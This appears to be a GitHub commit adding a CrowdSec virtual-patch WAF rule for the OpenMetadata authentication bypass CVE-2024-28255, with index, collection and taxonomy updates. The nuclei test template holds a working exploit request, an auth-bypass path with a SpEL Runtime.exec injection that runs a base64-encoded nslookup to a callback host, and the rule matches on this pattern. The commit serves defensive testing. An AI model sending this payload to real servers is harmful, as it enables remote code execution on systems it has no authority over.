Skip to content

Commit

Permalink
Add CVE-2024-28255 (#1082)
Browse files Browse the repository at this point in the history 
* Add CVE-2024-28255

---------

Co-authored-by: GitHub Action <[email protected]>
  • Loading branch information
@AlteredCoder @actions-user
AlteredCoder and actions-user authored Jul 31, 2024
1 parent ffd0492 commit 1bcbeb1
Show file tree
Hide file tree
Showing 6 changed files with 187 additions and 64 deletions.
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-28255/config.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml
nuclei_template: test-CVE-2024-28255.yaml
25 changes: 25 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@

id: test-CVE-2024-28255
info:
name: test-CVE-2024-28255
author: crowdsec
severity: info
description: test-CVE-2024-28255 testing
tags: appsec-testing
variables:
callback: "{{interactsh-url}}"
cmd: "nslookup {{callback}}"
payload: '{{base64(cmd)}}'
http:
- raw:
- |
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"

38 changes: 35 additions & 3 deletions .index.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1876,6 +1876,33 @@
"type": "exploit"
}
},
"crowdsecurity/vpatch-CVE-2024-28255": {
"path": "appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml",
"version": "0.1",
"versions": {
"0.1": {
"digest": "a8dcb3b263333cd588e22e561d24c4c7b9da54c1a83fcc8da60b4ac5acfacaae",
"deprecated": false
}
},
"content": "Cm5hbWU6IGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTI4MjU1CmRlc2NyaXB0aW9uOiAiT3Blbk1ldGFkYXRhIC0gQXV0aGVudGljYXRpb24gQnlwYXNzIChDVkUtMjAyNC0yODI1NSkiCnJ1bGVzOgogIC0gYW5kOgogICAgLSB6b25lczoKICAgICAgLSBNRVRIT0QKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IEdFVAogICAgLSB6b25lczoKICAgICAgLSBVUkkKICAgICAgdHJhbnNmb3JtOgogICAgICAtIGxvd2VyY2FzZQogICAgICAtIHVybGRlY29kZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBjb250YWlucwogICAgICAgIHZhbHVlOiAvYXBpL3YxO3YxL3VzZXJzL2xvZ2luL2V2ZW50cy9zdWJzY3JpcHRpb25zL3ZhbGlkYXRpb24vY29uZGl0aW9uCiAgICAtIHpvbmVzOgogICAgICAtIFVSSV9GVUxMCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogImphdmEubGFuZy5ydW50aW1lIgoKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiT3Blbk1ldGFkYXRhIC0gQXV0aGVudGljYXRpb24gQnlwYXNzIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAyNC0yODI1NQogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtOTQ=",
"description": "OpenMetadata - Authentication Bypass (CVE-2024-28255)",
"author": "crowdsecurity",
"labels": {
"behavior": "http:exploit",
"classification": [
"cve.CVE-2024-28255",
"attack.T1595",
"attack.T1190",
"cwe.CWE-94"
],
"confidence": 3,
"label": "OpenMetadata - Authentication Bypass",
"service": "http",
"spoofable": 0,
"type": "exploit"
}
},
"crowdsecurity/vpatch-CVE-2024-29849": {
"path": "appsec-rules/crowdsecurity/vpatch-CVE-2024-29849.yaml",
"version": "0.5",
Expand Down Expand Up @@ -2889,7 +2916,7 @@
},
"crowdsecurity/appsec-virtual-patching": {
"path": "collections/crowdsecurity/appsec-virtual-patching.yaml",
"version": "3.3",
"version": "3.4",
"versions": {
"0.1": {
"digest": "a165d638c8d826a932e4ca4e70ec5379d558a0bee1356e871c7c92cc2df714fc",
Expand Down Expand Up @@ -3022,10 +3049,14 @@
"3.3": {
"digest": "7cd4bdca37098a2a398262c253dfa2d2925168b1820cc58ea62ea953a1517722",
"deprecated": false
},
"3.4": {
"digest": "0b89691d948596e37fc998f369d2f782b0357f0036a6752ae5b3811566615236",
"deprecated": false
}
},
"long_description": "IyBBcHBTZWMgVmlydHVhbCBQYXRjaGluZwoKVGhpcyBjb2xsZWN0aW9uIGNvbnRhaW5zIHZpcnR1YWwgcGF0Y2hpbmcgZm9yIGNvbW1vbmx5IGV4cGxvaXRlZCB2dWxuZXJhYmlsaXRpZXMsIGFuZCBpcyBpbnNwaXJlZCBieSB0aGUgW0NJU0EgS25vd24gRXhwbG9pdGVkIFZ1bG5lcmFiaWxpdGllcyBDYXRhbG9nXShodHRwczovL3d3dy5jaXNhLmdvdi9rbm93bi1leHBsb2l0ZWQtdnVsbmVyYWJpbGl0aWVzLWNhdGFsb2cpLiBUaGUgZ29hbCBpcyB0byBwcm92aWRlIHZpcnR1YWwgcGF0Y2hpbmcgY2FwYWJpbGl0aWVzIGZvciB0aGUgbW9zdCBvZnRlbiBleHBsb2l0ZWQgdnVsbmVyYWJpbGl0aWVzLCBhdm9pZGluZyBmYWxzZSBwb3NpdGl2ZXMgd2hpbGUgY2F0Y2hpbmcgcGVvcGxlIHNjb3V0aW5nIHlvdXIgYXBwbGljYXRpb25zIGZvciBqdWljeSB2dWxuZXJhYmlsaXRpZXMuCg==",
"content": "bmFtZTogY3Jvd2RzZWN1cml0eS9hcHBzZWMtdmlydHVhbC1wYXRjaGluZwphcHBzZWMtcnVsZXM6CiAgLSBjcm93ZHNlY3VyaXR5L2Jhc2UtY29uZmlnCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1lbnYtYWNjZXNzCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00MDA0NAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTctOTg0MQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjAtMTE3MzgKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTI3OTI2CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi0zNTkxNAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItNDYxNjkKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIwMTk4CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yMjUxNQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzM2MTcKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM0MzYyCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zNTE5CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00Mjc5MwogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNTAxNjQKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM4MjA1CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yNDQ4OQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMzEyOQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMjI5NDEKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE5LTEyOTg5CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi00NDg3NwogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTgtMTA1NjIKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTY1NTMKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE4LTEwMDA4NjEKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE5LTEwMDMwMzAKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTIyOTY1CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yMzc1MgogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDkwNzAKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLWxhcmF2ZWwtZGVidWctbW9kZQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjgxMjEKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIwLTE3NDk2CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0xMzg5CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy03MDI4CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00NjgwNQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMjM4OTcKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIyNTI3CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zNTA3OAogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzUwODIKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTIyOTU0CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0xMjEyCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1zeW1mb255LXByb2ZpbGVyCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1jb25uZWN0d2lzZS1hdXRoLWJ5cGFzcwogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMjIwMjQKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTI3MTk4CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0zMjczCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC00NTc3CiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0yOTg0OQogIC0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDcyMTgKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLWdpdC1jb25maWcKICAtIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTMyMTEzCiAgLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0zMjcyCmFwcHNlYy1jb25maWdzOgogIC0gY3Jvd2RzZWN1cml0eS92aXJ0dWFsLXBhdGNoaW5nCiAgLSBjcm93ZHNlY3VyaXR5L2FwcHNlYy1kZWZhdWx0CnBhcnNlcnM6CiAgLSBjcm93ZHNlY3VyaXR5L2FwcHNlYy1sb2dzCnNjZW5hcmlvczoKICAtIGNyb3dkc2VjdXJpdHkvYXBwc2VjLXZwYXRjaApjb250ZXh0czoKICAtIGNyb3dkc2VjdXJpdHkvYXBwc2VjX2Jhc2UKZGVzY3JpcHRpb246ICJhIGdlbmVyaWMgdmlydHVhbCBwYXRjaGluZyBjb2xsZWN0aW9uLCBzdWl0YWJsZSBmb3IgbW9zdCB3ZWIgc2VydmVycy4iCmF1dGhvcjogY3Jvd2RzZWN1cml0eQo=",
"content": "YXBwc2VjLWNvbmZpZ3M6Ci0gY3Jvd2RzZWN1cml0eS92aXJ0dWFsLXBhdGNoaW5nCi0gY3Jvd2RzZWN1cml0eS9hcHBzZWMtZGVmYXVsdAphcHBzZWMtcnVsZXM6Ci0gY3Jvd2RzZWN1cml0eS9iYXNlLWNvbmZpZwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLWVudi1hY2Nlc3MKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy00MDA0NAotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE3LTk4NDEKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMC0xMTczOAotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTI3OTI2Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItMzU5MTQKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi00NjE2OQotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIwMTk4Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjI1MTUKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zMzYxNwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTM0MzYyCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzUxOQotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTQyNzkzCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNTAxNjQKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zODIwNQotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTI0NDg5Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMzEyOQotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIxLTIyOTQxCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTktMTI5ODkKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMi00NDg3NwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE4LTEwNTYyCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNjU1MwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDE4LTEwMDA4NjEKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAxOS0xMDAzMDMwCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItMjI5NjUKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0yMzc1MgotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTQ5MDcwCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtbGFyYXZlbC1kZWJ1Zy1tb2RlCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjgxMjEKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMC0xNzQ5NgotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTEzODkKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy03MDI4Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDY4MDUKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0yMzg5NwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIzLTIyNTI3Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMzUwNzgKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyMy0zNTA4MgotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDIyLTIyOTU0Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMTIxMgotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLXN5bWZvbnktcHJvZmlsZXIKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1jb25uZWN0d2lzZS1hdXRoLWJ5cGFzcwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTIyMDI0Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMjcxOTgKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0zMjczCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtNDU3NwotIGNyb3dkc2VjdXJpdHkvdnBhdGNoLUNWRS0yMDI0LTI5ODQ5Ci0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtNDcyMTgKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1naXQtY29uZmlnCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMzIxMTMKLSBjcm93ZHNlY3VyaXR5L3ZwYXRjaC1DVkUtMjAyNC0zMjcyCi0gY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjQtMjgyNTUKYXV0aG9yOiBjcm93ZHNlY3VyaXR5CmNvbnRleHRzOgotIGNyb3dkc2VjdXJpdHkvYXBwc2VjX2Jhc2UKZGVzY3JpcHRpb246IGEgZ2VuZXJpYyB2aXJ0dWFsIHBhdGNoaW5nIGNvbGxlY3Rpb24sIHN1aXRhYmxlIGZvciBtb3N0IHdlYiBzZXJ2ZXJzLgpuYW1lOiBjcm93ZHNlY3VyaXR5L2FwcHNlYy12aXJ0dWFsLXBhdGNoaW5nCnBhcnNlcnM6Ci0gY3Jvd2RzZWN1cml0eS9hcHBzZWMtbG9ncwpzY2VuYXJpb3M6Ci0gY3Jvd2RzZWN1cml0eS9hcHBzZWMtdnBhdGNoCg==",
"description": "a generic virtual patching collection, suitable for most web servers.",
"author": "crowdsecurity",
"labels": null,
Expand Down Expand Up @@ -3086,7 +3117,8 @@
"crowdsecurity/vpatch-CVE-2023-47218",
"crowdsecurity/vpatch-git-config",
"crowdsecurity/vpatch-CVE-2024-32113",
"crowdsecurity/vpatch-CVE-2024-3272"
"crowdsecurity/vpatch-CVE-2024-3272",
"crowdsecurity/vpatch-CVE-2024-28255"
],
"appsec-configs": [
"crowdsecurity/virtual-patching",
Expand Down
38 changes: 38 additions & 0 deletions appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@

name: crowdsecurity/vpatch-CVE-2024-28255
description: "OpenMetadata - Authentication Bypass (CVE-2024-28255)"
rules:
- and:
- zones:
- METHOD
match:
type: equals
value: GET
- zones:
- URI
transform:
- lowercase
- urldecode
match:
type: contains
value: /api/v1;v1/users/login/events/subscriptions/validation/condition
- zones:
- URI_FULL
transform:
- lowercase
match:
type: contains
value: "java.lang.runtime"

labels:
type: exploit
service: http
confidence: 3
spoofable: 0
behavior: "http:exploit"
label: "OpenMetadata - Authentication Bypass"
classification:
- cve.CVE-2024-28255
- attack.T1595
- attack.T1190
- cwe.CWE-94
123 changes: 62 additions & 61 deletions collections/crowdsecurity/appsec-virtual-patching.yaml
View file
Original file line number Diff line number Diff line change
@@ -1,64 +1,65 @@
name: crowdsecurity/appsec-virtual-patching
appsec-rules:
- crowdsecurity/base-config
- crowdsecurity/vpatch-env-access
- crowdsecurity/vpatch-CVE-2023-40044
- crowdsecurity/vpatch-CVE-2017-9841
- crowdsecurity/vpatch-CVE-2020-11738
- crowdsecurity/vpatch-CVE-2022-27926
- crowdsecurity/vpatch-CVE-2022-35914
- crowdsecurity/vpatch-CVE-2022-46169
- crowdsecurity/vpatch-CVE-2023-20198
- crowdsecurity/vpatch-CVE-2023-22515
- crowdsecurity/vpatch-CVE-2023-33617
- crowdsecurity/vpatch-CVE-2023-34362
- crowdsecurity/vpatch-CVE-2023-3519
- crowdsecurity/vpatch-CVE-2023-42793
- crowdsecurity/vpatch-CVE-2023-50164
- crowdsecurity/vpatch-CVE-2023-38205
- crowdsecurity/vpatch-CVE-2023-24489
- crowdsecurity/vpatch-CVE-2021-3129
- crowdsecurity/vpatch-CVE-2021-22941
- crowdsecurity/vpatch-CVE-2019-12989
- crowdsecurity/vpatch-CVE-2022-44877
- crowdsecurity/vpatch-CVE-2018-10562
- crowdsecurity/vpatch-CVE-2023-6553
- crowdsecurity/vpatch-CVE-2018-1000861
- crowdsecurity/vpatch-CVE-2019-1003030
- crowdsecurity/vpatch-CVE-2022-22965
- crowdsecurity/vpatch-CVE-2023-23752
- crowdsecurity/vpatch-CVE-2023-49070
- crowdsecurity/vpatch-laravel-debug-mode
- crowdsecurity/vpatch-CVE-2023-28121
- crowdsecurity/vpatch-CVE-2020-17496
- crowdsecurity/vpatch-CVE-2023-1389
- crowdsecurity/vpatch-CVE-2023-7028
- crowdsecurity/vpatch-CVE-2023-46805
- crowdsecurity/vpatch-CVE-2024-23897
- crowdsecurity/vpatch-CVE-2023-22527
- crowdsecurity/vpatch-CVE-2023-35078
- crowdsecurity/vpatch-CVE-2023-35082
- crowdsecurity/vpatch-CVE-2022-22954
- crowdsecurity/vpatch-CVE-2024-1212
- crowdsecurity/vpatch-symfony-profiler
- crowdsecurity/vpatch-connectwise-auth-bypass
- crowdsecurity/vpatch-CVE-2024-22024
- crowdsecurity/vpatch-CVE-2024-27198
- crowdsecurity/vpatch-CVE-2024-3273
- crowdsecurity/vpatch-CVE-2024-4577
- crowdsecurity/vpatch-CVE-2024-29849
- crowdsecurity/vpatch-CVE-2023-47218
- crowdsecurity/vpatch-git-config
- crowdsecurity/vpatch-CVE-2024-32113
- crowdsecurity/vpatch-CVE-2024-3272
appsec-configs:
- crowdsecurity/virtual-patching
- crowdsecurity/appsec-default
- crowdsecurity/virtual-patching
- crowdsecurity/appsec-default
appsec-rules:
- crowdsecurity/base-config
- crowdsecurity/vpatch-env-access
- crowdsecurity/vpatch-CVE-2023-40044
- crowdsecurity/vpatch-CVE-2017-9841
- crowdsecurity/vpatch-CVE-2020-11738
- crowdsecurity/vpatch-CVE-2022-27926
- crowdsecurity/vpatch-CVE-2022-35914
- crowdsecurity/vpatch-CVE-2022-46169
- crowdsecurity/vpatch-CVE-2023-20198
- crowdsecurity/vpatch-CVE-2023-22515
- crowdsecurity/vpatch-CVE-2023-33617
- crowdsecurity/vpatch-CVE-2023-34362
- crowdsecurity/vpatch-CVE-2023-3519
- crowdsecurity/vpatch-CVE-2023-42793
- crowdsecurity/vpatch-CVE-2023-50164
- crowdsecurity/vpatch-CVE-2023-38205
- crowdsecurity/vpatch-CVE-2023-24489
- crowdsecurity/vpatch-CVE-2021-3129
- crowdsecurity/vpatch-CVE-2021-22941
- crowdsecurity/vpatch-CVE-2019-12989
- crowdsecurity/vpatch-CVE-2022-44877
- crowdsecurity/vpatch-CVE-2018-10562
- crowdsecurity/vpatch-CVE-2023-6553
- crowdsecurity/vpatch-CVE-2018-1000861
- crowdsecurity/vpatch-CVE-2019-1003030
- crowdsecurity/vpatch-CVE-2022-22965
- crowdsecurity/vpatch-CVE-2023-23752
- crowdsecurity/vpatch-CVE-2023-49070
- crowdsecurity/vpatch-laravel-debug-mode
- crowdsecurity/vpatch-CVE-2023-28121
- crowdsecurity/vpatch-CVE-2020-17496
- crowdsecurity/vpatch-CVE-2023-1389
- crowdsecurity/vpatch-CVE-2023-7028
- crowdsecurity/vpatch-CVE-2023-46805
- crowdsecurity/vpatch-CVE-2024-23897
- crowdsecurity/vpatch-CVE-2023-22527
- crowdsecurity/vpatch-CVE-2023-35078
- crowdsecurity/vpatch-CVE-2023-35082
- crowdsecurity/vpatch-CVE-2022-22954
- crowdsecurity/vpatch-CVE-2024-1212
- crowdsecurity/vpatch-symfony-profiler
- crowdsecurity/vpatch-connectwise-auth-bypass
- crowdsecurity/vpatch-CVE-2024-22024
- crowdsecurity/vpatch-CVE-2024-27198
- crowdsecurity/vpatch-CVE-2024-3273
- crowdsecurity/vpatch-CVE-2024-4577
- crowdsecurity/vpatch-CVE-2024-29849
- crowdsecurity/vpatch-CVE-2023-47218
- crowdsecurity/vpatch-git-config
- crowdsecurity/vpatch-CVE-2024-32113
- crowdsecurity/vpatch-CVE-2024-3272
- crowdsecurity/vpatch-CVE-2024-28255
author: crowdsecurity
contexts:
- crowdsecurity/appsec_base
description: a generic virtual patching collection, suitable for most web servers.
name: crowdsecurity/appsec-virtual-patching
parsers:
- crowdsecurity/appsec-logs
- crowdsecurity/appsec-logs
scenarios:
- crowdsecurity/appsec-vpatch
contexts:
- crowdsecurity/appsec_base
description: "a generic virtual patching collection, suitable for most web servers."
author: crowdsecurity
- crowdsecurity/appsec-vpatch
22 changes: 22 additions & 0 deletions taxonomy/scenarios.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1125,6 +1125,28 @@
"CWE-94"
]
},
"crowdsecurity/vpatch-CVE-2024-28255": {
"name": "crowdsecurity/vpatch-CVE-2024-28255",
"description": "OpenMetadata - Authentication Bypass (CVE-2024-28255)",
"label": "OpenMetadata - Authentication Bypass",
"behaviors": [
"http:exploit"
],
"mitre_attacks": [
"TA0043:T1595",
"TA0001:T1190"
],
"confidence": 3,
"spoofable": 0,
"cti": true,
"service": "http",
"cves": [
"CVE-2024-28255"
],
"cwes": [
"CWE-94"
]
},
"crowdsecurity/vpatch-CVE-2024-29849": {
"name": "crowdsecurity/vpatch-CVE-2024-29849",
"description": "Veeam Backup Enterprise Manager - Authentication Bypass (CVE-2024-29849)",
Expand Down

0 comments on commit 1bcbeb1

Please sign in to comment.